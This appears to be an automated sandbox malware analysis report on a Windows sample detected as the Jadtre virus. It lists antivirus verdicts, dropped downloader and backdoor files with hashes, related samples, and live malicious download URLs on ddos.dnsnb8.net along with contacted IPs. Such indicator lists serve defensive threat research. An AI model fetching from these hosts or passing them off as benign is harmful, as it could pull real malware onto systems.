            gE4NVCZDRk.exe | 97% | ReversingLabs | Win32.Virus.Jadtre
            gE4NVCZDRk.exe | 100% | Avira | W32/Jadtre.B
            gE4NVCZDRk.exe | 100% | Joe Sandbox ML |
            Antivirus detection for dropped files
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\XekSuT.exe | 100% | Avira | TR/Dldr.Small.Z.haljq
            C:\Users\user\AppData\Local\Temp\6011859.dll | 100% | Avira | BDS/Backdoor.Gen7
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B
            C:\Program Files\7-Zip\Uninstall.exe | 100% | Avira | W32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B
            C:\Users\user\AppData\Local\Temp\XekSuT.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\6011859.dll | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
            C:\Program Files\7-Zip\Uninstall.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\6011859.dll | 96% | ReversingLabs | Win32.Backdoor.Venik
            C:\Users\user\AppData\Local\Temp\XekSuT.exe | 97% | ReversingLabs | Win32.Trojan.Skeeyah
            C:\Windows\SysWOW64\SySyeu.exe | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            http://upx.sf.net | 0% | URL Reputation | safe
            Contacted domains
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ddos.dnsnb8.net | 44.221.84.105 | true | true | | unknown
            Contacted URLs
            Name | Malicious | Antivirus Detection | Reputation
            http://ddos.dnsnb8.net:799/cj//k3.rar | true | | unknown
            http://ddos.dnsnb8.net:799/cj//k2.rar | true | | unknown
            http://ddos.dnsnb8.net:799/cj//k5.rar | true | | unknown
            http://ddos.dnsnb8.net:799/cj//k1.rar | true | | unknown
            http://ddos.dnsnb8.net:799/cj//k4.rar | true | | unknown
            Contacted public IPs
            IP | Domain | Country | ASN | ASN Name | Malicious
            119.91.152.151 | unknown | China | 24143 | CNNIC-QCN-APQingdaoCableTVNetworkCenterCN | true
            44.221.84.105 | ddos.dnsnb8.net | United States | 14618 | AMAZON-AESUS | true

            Contacted private IPs
            IP
            127.0.0.1
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1544387
            Start date and time: 2024-10-29 10:58:06 +01:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 7m 52s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of new started processes analysed: 15
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: gE4NVCZDRk.exe
            renamed because original name is a hash value
            Original Sample Name: 02b3757b29002a8fcabd9afaebf1f7d3.exe
            Detection: MAL
            Classification: mal100.spre.bank.troj.evad.winEXE@24/33@1/3
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 37
            • Number of non-executed functions: 93
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
            • Excluded IPs from analysis (whitelisted): 20.189.173.21
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes were analyzed; the report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: gE4NVCZDRk.exe
            Time | Type | Description
            05:59:18 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
            05:59:34 | API Interceptor | 9763412x Sleep call for process: svchost.exe modified
            05:59:41 | API Interceptor | 1517x Sleep call for process: SySyeu.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            119.91.152.151uHmFQqHIIA.exeGet hashmaliciousRunningRATBrowse
                                                                              2Syx0ZLsgo.exeGet hashmaliciousRunningRATBrowse
                                                                                I6A09pYeTA.exeGet hashmaliciousRunningRATBrowse
                                                                                  SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                    harst.exeGet hashmaliciousRunningRATBrowse
                                                                                      sIhckM7o37.exeGet hashmaliciousGh0stCringe RunningRATBrowse
                                                                                        44.221.84.105AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • npukfztj.biz/clexsjcapi
                                                                                        SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                        • banwyw.biz/awjdluu
                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • uphca.biz/yfvdkcw
                                                                                        ib.exeGet hashmaliciousBdaejecBrowse
                                                                                        • ddos.dnsnb8.net:799/cj//k1.rar
                                                                                        RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • jhvzpcfg.biz/qsmoxnmhx
                                                                                        samoanaliz-uroka-okruzhayuschij-mir-po-teme-kakie-byvayut-zhivotnye.exeGet hashmaliciousUnknownBrowse
                                                                                        • wxanalytics.ru/net.exe
                                                                                        balet-spyaschaya-krasavitsa.exeGet hashmaliciousUnknownBrowse
                                                                                        • wxanalytics.ru/net.exe
                                                                                        http://44.221.84.105Get hashmaliciousUnknownBrowse
                                                                                        • 44.221.84.105/favicon.ico
                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • neazudmrq.biz/yewbnslbiwmcquj
                                                                                        PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • banwyw.biz/wrjeoyp
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ddos.dnsnb8.netib.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
                                                                                        • 44.221.84.105
                                                                                        BUG32.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        7Y18r(212).exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                                                                                        • 44.221.84.105
                                                                                        A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                                                        • 44.221.84.105
                                                                                        BUG32.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AMAZON-AESUShttps://dvhpkbq.sharing.bublup.com/mybublup/#/mystuff/001-f-cb6f5ea2-07bf-4021-a767-4b4547f8c10b/mixed?lid=001-si-_s1J1-rGiVhhGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 3.213.224.128
                                                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.30.10.248
                                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 3.94.160.165
                                                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.139.27.107
                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.221.133.31
                                                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                        • 100.25.27.129
                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 44.210.77.34
                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.129.85.119
                                                                                        https://ws.onehub.com/files/3wbmh4dnGet hashmaliciousUnknownBrowse
                                                                                        • 54.173.137.115
                                                                                        https://filerit.com/pi-240924.ps1Get hashmaliciousUnknownBrowse
• 50.16.37.48
Match: CNNIC-QCN-AP Qingdao Cable TV Network Center CN
• Associated sample: la.bot.arm.elf; Detection: malicious; Threat name: Unknown; Context: 119.91.25.3
• Associated sample: byte.arm7.elf; Detection: malicious; Threat name: Mirai, Okiru; Context: 119.91.250.10
• Associated sample: la.bot.mips.elf; Detection: malicious; Threat name: Unknown; Context: 115.174.103.181
• Associated sample: la.bot.arm5.elf; Detection: malicious; Threat name: Unknown; Context: 220.112.52.250
• Associated sample: uHmFQqHIIA.exe; Detection: malicious; Threat name: RunningRAT; Context: 119.91.152.151
• Associated sample: SecuriteInfo.com.Variant.Giant.Zusy.6.12808.9954.exe; Detection: malicious; Threat name: Unknown; Context: 119.91.67.107
• Associated sample: novo.x86_64.elf; Detection: malicious; Threat name: Mirai, Moobot; Context: 60.232.182.139
• Associated sample: 2Syx0ZLsgo.exe; Detection: malicious; Threat name: RunningRAT; Context: 119.91.152.151
• Associated sample: I6A09pYeTA.exe; Detection: malicious; Threat name: RunningRAT; Context: 119.91.152.151
• Associated sample: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe; Detection: malicious; Threat name: GhostRat, Nitol; Context: 119.91.152.151
No context
Columns: Match; Associated Sample Name / URL; SHA 256; Detection; Threat Name; Link; Context
Match: C:\Users\user\AppData\Local\Temp\XekSuT.exe
• Associated sample: ib.exe; Detection: malicious; Threat name: Bdaejec
• Associated sample: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe; Detection: malicious; Threat name: Bdaejec
• Associated sample: 8VB4lVuZk3.exe; Detection: malicious; Threat name: Bdaejec
• Associated sample: biKy3nZEyJ.exe; Detection: malicious; Threat name: Bdaejec
• Associated sample: biKy3nZEyJ.exe; Detection: malicious; Threat name: Bdaejec
• Associated sample: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Detection: malicious; Threat name: Bdaejec, Sality
• Associated sample: a4#Uff09.exe; Detection: malicious; Threat name: Bdaejec, Sality
• Associated sample: 1.0.0.2.exe; Detection: malicious; Threat name: Bdaejec, Sality
• Associated sample: log1.exe; Detection: malicious; Threat name: Babadeda, Bdaejec, Neshta
• Associated sample: log2.exe; Detection: malicious; Threat name: Babadeda, Bdaejec, Neshta
Match: C:\Users\user\AppData\Local\Temp\6011859.dll
• Associated sample: uHmFQqHIIA.exe; Detection: malicious; Threat name: RunningRAT
Process: C:\Users\user\AppData\Local\Temp\XekSuT.exe
File Type: MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 19456
Entropy (8bit): 6.590488550549625
Encrypted: false
SSDEEP: 384:1F/S8XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:ycQGPL4vzZq2o9W7GsxBbPr
MD5: 87EBBA9962E0431E9BED32CB7E5DF48A
SHA1: B5D695A1E4759FF6A2846E1A0E526A2ADF8AE3A2
SHA-256: 8B859F26169ED9EE2DCB671391BE25FD36494FF2B272D359561322131935809C
SHA-512: 502E1B1CA82AA2E35216955FD0508B5CB4EBDB910F930953528E84047B03D71F76403C81647596DCAE2A2D722E91CA9528B12D425158250AFE91EB9F53239943
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
Process: C:\Users\user\AppData\Local\Temp\XekSuT.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2389504
Entropy (8bit): 6.731338221304018
Encrypted: false
SSDEEP: 49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5: 4C118C50DF307996419B06E92163087D
SHA1: 29825FBD6055C6AC06E91293C024C496A6B42439
SHA-256: CFF2F2A0EAEADA0E77739524E284275912CCBE6E9F34341105E9B7A1C5B8C961
SHA-512: 473A8893C79F1FB7A9E120FFFF31F23CB7D83C09BF9C7356C8BB80C975858E16A427DCCA628D4C96DFA7BD4B285D8FE0EC869CF73E6F78AA1E8462A70DC5B17E
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\XekSuT.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 31744
Entropy (8bit): 6.366075585544415
Encrypted: false
SSDEEP: 768:uWQ3655Kv1X/qY1MSdlIQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdlDGCq2iW7z
MD5: B4E43FE71C2D3E1EE806FA4CE9E78C13
SHA1: 43E9681F79AE68CCA8119CBE1028795BCE3FA6C0
SHA-256: 7284D7F7B495D6A858B295ED3D70F9D8D6A22068194964582EC2F66F8964EEB3
SHA-512: 61B685A964E53226EB59275BE524C9E2325EA9BC4BAC96F77156717518D10199643D153DA5CA1BC9C0F4E42A0853591A9E932696536AB73AA908C1BA85AFE4FF
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.923185171504473
Encrypted: false
SSDEEP: 96:wfFNbsxhnj7afzQXIDcQNc6UkcEUscw3US3B+HbHg/5ksS/YyNlIcIPkMhFSDOyn:e3b60zBNYjE/hzuiF5Z24IO8t
MD5: F0AA0BFCB93467751D00632007E5999B
SHA1: 83EC6E350784C641B51DAF59DA6110BE8465D932
SHA-256: 080B9367A38EA12E878D5AE2CABFA8C118E931D6FF7F404CDE8944D1830C4E41
SHA-512: DF1BC73C85C5713EE6A055FC15ADA9C66806D5F366DA1EF5FBE081466A313C74D00A7ED335B3F3E7C0EEEF4E5A366073FCA061CECCD145898B524134521F2D47
Malicious: false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.6.9.5.4.3.5.4.1.5.7.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.6.9.5.4.3.9.7.9.0.6.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.0.5.e.1.f.2.-.2.9.2.9.-.4.2.6.7.-.a.b.b.0.-.a.6.6.0.8.c.1.1.6.9.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.c.e.1.8.3.4.-.d.7.1.2.-.4.1.8.9.-.9.4.3.c.-.d.8.3.f.e.7.4.6.a.3.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.e.k.S.u.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.4.-.0.0.0.1.-.0.0.1.4.-.7.c.1.c.-.a.6.2.b.e.9.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.9.c.9.2.8.8.0.c.1.f.5.b.6.d.4.e.9.0.0.8.e.2.8.1.a.0.6.a.5.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.X.e.k.S.u.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Oct 29 09:59:03 2024, 0x1205a4 type
Category: dropped
Size (bytes): 145430
Entropy (8bit): 1.7774967696149961
Encrypted: false
SSDEEP: 768:4hUZh3Jx9IYtVIfQHmn2v3sMsJFfJLVM8wJ:/EuqIHbv8MsJFfJLVM8wJ
MD5: CB04677561BDCEF17F7B4484C862DB4F
SHA1: 85CAB31832F7D1D922BCB4C729EC55D0E3D54B49
SHA-256: 6438AB196743ED43ACCCF2CE259A9DFF63F5DDAAB30C12F5A05586F189168C90
SHA-512: B1E2263F89921F2053CF11456BDB79716D158D8F1886C73EAAB506F7EF83D17B1353F6606AFD25532B31C1F6D97E3062829B214A022BE11706A3B1B7938CA0B6
Malicious: false
                                                                                                              Preview:MDMP..a..... ........ g............D...............X...........0............K..........`.......8...........T............7..............,............ ..............................................................................eJ....... ......GenuineIntel............T.......$.... g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6264
Entropy (8bit): 3.7171214775947585
Encrypted: false
SSDEEP: 96:RSIU6o7wVetbK66SGxY2Il3Meu5aMQUO89bCbgsfnWm:R6l7wVeJK66SGxY2/pDO89bCbgsfnWm
MD5: F16F7CE1D7433D048E390E09BB444948
SHA1: 4555E5DB76047FAC6E265AEA9487380CB7C2865D
SHA-256: 348B586D0D1601598F5DAC32AC7FCD2CE47162E7563F81B2D6EF653D64EFF88B
SHA-512: 4C89413D693FD4F99136D8E3F202858F6CB7CE09B2141C13BFFE040C5E161F350CA75B469908D66C319858F97F4B68AF1B62C2D89B845E0F16C334E692400A74
Malicious: false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.0.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4551
Entropy (8bit): 4.452302697276403
Encrypted: false
SSDEEP: 48:cvIwWl8zs8uJg77aI9s/WpW8VYeYm8M4JENFx+q8YaPg3dd:uIjf8kI7Wu7V6JIMPg3dd
MD5: 79924F21F29EC0A463CB7CB783F882E4
SHA1: FF30B53E73FC7B54046CEF328C17B6DD58CD2F55
SHA-256: 2B67795A95C244E5D82406D751AB29D01ED2DD1F0E3814443293C6F93D926CB2
SHA-512: AD4C6728B2E9EA4E8B4F9F4623953382CBFC9723370DC1346A1544859504EBB457F0C01B381B13C404AF9638B8181F6C8D6F0A6DCD3DAF4112FEA58AF47A4C91
Malicious: false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="564541" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 81388
Entropy (8bit): 3.087601366047006
Encrypted: false
SSDEEP: 768:eU1sfPSs4QIvNwzfYAeT8ps21VM63gUqMBhZY/Xid/8YH0npo/:TkSs4/Nwzs8hvMUgU3Bhm/XitL0npo/
MD5: 7D5C7E4C444D432D1EA6B0BAC1EEC4E4
SHA1: 49B47BFA0D498AC5F313F89DC9746F73DAA3D724
SHA-256: A1B8DC99A7440A66238E5E09768CBEF7FF4381AB5A5908DB88B345093323F102
SHA-512: 9CEF3A1FABD23297D6A547292F598328FD16D462DE4CF2F3F6FF1C5588AA90E5DB44A0415AFF63440EF1AFF06D59387EDA3CB0C8C4E8732EA51AA09E3CD35DA9
Malicious: false
                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 13340
Entropy (8bit): 2.6866353511897088
Encrypted: false
SSDEEP: 96:TiZYWnPoDJPKYsYhWeH4YEZiEztEi9x4tmzwOrlLwHajCGMKpKI+3v3:2ZDvLakuHajCGMKp9+3v3
MD5: 66CCD8EB5BE964C5EA8BEC9C9E18920F
SHA1: 233C91912BE43C2415E9BDD0B16596B70DAC5F23
SHA-256: FC987F9A02130C8E5B0444DB94986895D415B4E4BC93B48B76558DBA654C35A9
SHA-512: 2F2AEEFA0232D063631A92A2EC5C9A20C9E304166AB68B5BBBD10E6801583FF0E2CEBCE2C5CCED9215153FF473867EA528F42A3713C9ABBFA57AE3BA68EB4ED6
Malicious: false
                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
Process: C:\Users\user\AppData\Local\Temp\XekSuT.exe
File Type: ASCII text
Category: dropped
Size (bytes): 4
Entropy (8bit): 1.5
Encrypted: false
SSDEEP: 3:Nv:9
MD5: D3B07384D113EDEC49EAA6238AD5FF00
SHA1: F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256: B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512: 0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious: false
Preview: foo.
Process: C:\Users\user\AppData\Local\Temp\XekSuT.exe
File Type: ASCII text
Category: dropped
Size (bytes): 4
Entropy (8bit): 1.5
Encrypted: false
SSDEEP: 3:Nv:9
MD5: D3B07384D113EDEC49EAA6238AD5FF00
